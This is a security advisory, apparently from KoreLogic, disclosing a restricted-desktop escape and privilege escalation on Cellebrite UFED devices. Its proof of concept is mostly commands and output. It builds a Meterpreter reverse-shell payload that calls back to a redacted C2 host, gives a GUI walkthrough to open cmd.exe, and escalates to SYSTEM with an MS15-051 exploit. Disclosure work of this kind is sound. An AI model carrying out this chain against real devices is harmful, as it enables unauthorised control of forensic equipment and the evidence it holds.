Cellebrite Restricted Desktop Escape and Escalation of User Privilege

Vulnerability Description

Cellebrite UFED device implements local operating system policies that can be circumvented to obtain a command prompt. From there privilege escalation is possible using public exploits.

Technical Description

The Cellebrite UFED device implements local operating system policies which are designed to limit access to operating system functionality. These include but may not be limited to:

1. Preventing access to dialog such as Run, File Browser, and Explorer.

and

2. Preventing access to process and application management tools such as Task Manager and the Control Panel.

These policies can be circumvented by using functionality that is permitted by the policy governing the use of the user desktop. A user can leverage the Wireless Network connection string to select certificate based authentication, which then enables file dialogs that are able to be used to launch a command prompt. Following this, privileges can be elevated using off the shelf and publicly available exploits relevant to the specific Windows version in use.

Mitigation and Remediation Recommendation

The vendor has informed KoreLogic that this vulnerability is not present on devices manufactured “at least since 2018.” The vendor was uncertain of the exact version number that remediated this attack vector.

Credit

This vulnerability was discovered by Matt Bergin (@thatguylevel) of KoreLogic, Inc.

Proof of Concept

Begin by using the msfvenom binary to create a meterpreter payload that will initiate a remote connection to a C2. Copy the payload to a USB drive. Following this, use the msfconsole binary to create a C2 connection handler with the multi/handler functionality.

  $ msfvenom -p windows/meterpreter/reverse_tcp -f exe -o payload.exe LHOST=[REDACTED] LPORT=8888
  [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
  [-] No arch selected, selecting arch: x86 from the payload
  No encoder or badchars specified, outputting raw payload
  Payload size: 341 bytes
  Final size of exe file: 73802 bytes
  Saved as: payload.exe
  $ sudo mount -o rw /dev/sda1 a/
  $ sudo cp payload.exe a/
  $ sync
  $ sudo umount a/
  $ msfconsole
  [snip]
  msf5 exploit(multi/handler) > show options

  Module options (exploit/multi/handler):

     Name  Current Setting  Required  Description
     ----  ---------------  --------  -----------


  Payload options (windows/meterpreter/reverse_tcp):

     Name      Current Setting  Required  Description
     ----      ---------------  --------  -----------
     EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
     LHOST     [REDACTED]       yes       The listen address (an interface may be specified)
     LPORT     8888             yes       The listen port


  Exploit target:

     Id  Name
     --  ----
     0   Wildcard Target


  msf5 exploit(multi/handler) > exploit -j -z
  [*] Exploit running as background job 1.
  [*] Exploit completed, but no session was created.
  [*] Started reverse TCP handler on [REDACTED]:8888

Now insert the USB drive where payload.exe resides into a target Cellebrite device. Next, follow the steps below:

1. Open the Wireless Network Connection screen by clicking on the WiFi icon in the bottom right hand corner of the screen. This should be next to the system clock.

2. Select “Change advanced settings” — this will bring up a screen called Windows Network Connection Properties. Choose the Wireless Networks tab.

3. Under the Preferred networks section, click the Add button and then select the Authentication tab. Make sure “Enable IEEE 802.1x authentication for this network” is enabled.

4. Under EAP Type, select “Smart Card or other Certificate” and then click the Properties button.

5. Under Trusted Root Certificate Authorities click the View Certificate button. This will bring up a screen called Certificate, choose the Details tab and click the “Copy to File” button. This will bring up a screen called Certificate Export Wizard.

6. Click Next and select any of the available export format options. For example, choose the “DER encoded binary X.509” option and click next.

7. Instead of typing out a export path click the Browse button to open a file dialog. In the “File Name” box type: \WINDOWS\System32\ and under “Save as type” select the “All Files (*.*)” option. Hit the enter key.

8. Locate the cmd.exe file then drag and drop any DLL over it. For example, choose the clusapi.dll file located near the cmd.exe executable. This will open a Command Prompt screen as an unprivileged user.

9. Type the drive letter to change into the USB drive containing the payload.exe file.

  C:\windows\system32>D:
  D:\>payload.exe

This results in a connection back into Metasploit.

  [*] Sending stage (180291 bytes) to [REDACTED]
  [*] Meterpreter session 2 opened ([REDACTED]:8888 -> [REDACTED]:1041) at 2020-01-29 11:41:05 -0800
  msf5 exploit(multi/handler) > sessions -i 2
  [*] Starting interaction with 2...
  meterpreter > getuid
  Server username: TOUCH-[REDACTED]\Operator

An exploit for CVE-2015-1701 is loaded up and configured to run a local privilege escalation exploit against the unprivileged session and SYSTEM is obtained.

  msf5 exploit(windows/local/ms15_051_client_copy_image) > show options

  Module options (exploit/windows/local/ms15_051_client_copy_image):

     Name     Current Setting  Required  Description
     ----     ---------------  --------  -----------
     SESSION                   yes       The session to run this module on.


  Exploit target:

     Id  Name
     --  ----
     0   Windows x86

  msf5 exploit(windows/local/ms15_051_client_copy_image) > set SESSION 2
  SESSION => 2
  msf5 exploit(windows/local/ms15_051_client_copy_image) > set PAYLOAD windows/meterpreter/reverse_tcp
  PAYLOAD => windows/meterpreter/reverse_tcp
  msf5 exploit(windows/local/ms15_051_client_copy_image) > set LPORT 8888
  LPORT => 8888
  msf5 exploit(windows/local/ms15_051_client_copy_image) > set LHOST [REDACTED]
  LHOST => [REDACTED]
  msf5 exploit(windows/local/ms15_051_client_copy_image) > run

  [*] Started reverse TCP handler on [REDACTED]:8888
  [*] Launching notepad to host the exploit...
  [+] Process 3936 launched.
  [*] Reflectively injecting the exploit DLL into 3936...
  [*] Injecting exploit into 3936...
  [*] Exploit injected. Injecting payload into 3936...
  [*] Payload injected. Executing exploit...
  [*] Sending stage (180291 bytes) to [REDACTED]
  [+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
  [*] Meterpreter session 3 opened ([REDACTED]:8888 -> [REDACTED]:1045) at 2020-01-29 11:48:15 -0800

  meterpreter > getuid
  Server username: NT AUTHORITY\SYSTEM
  meterpreter >

The contents of this advisory are copyright(c) 2020 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at: https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.3.txt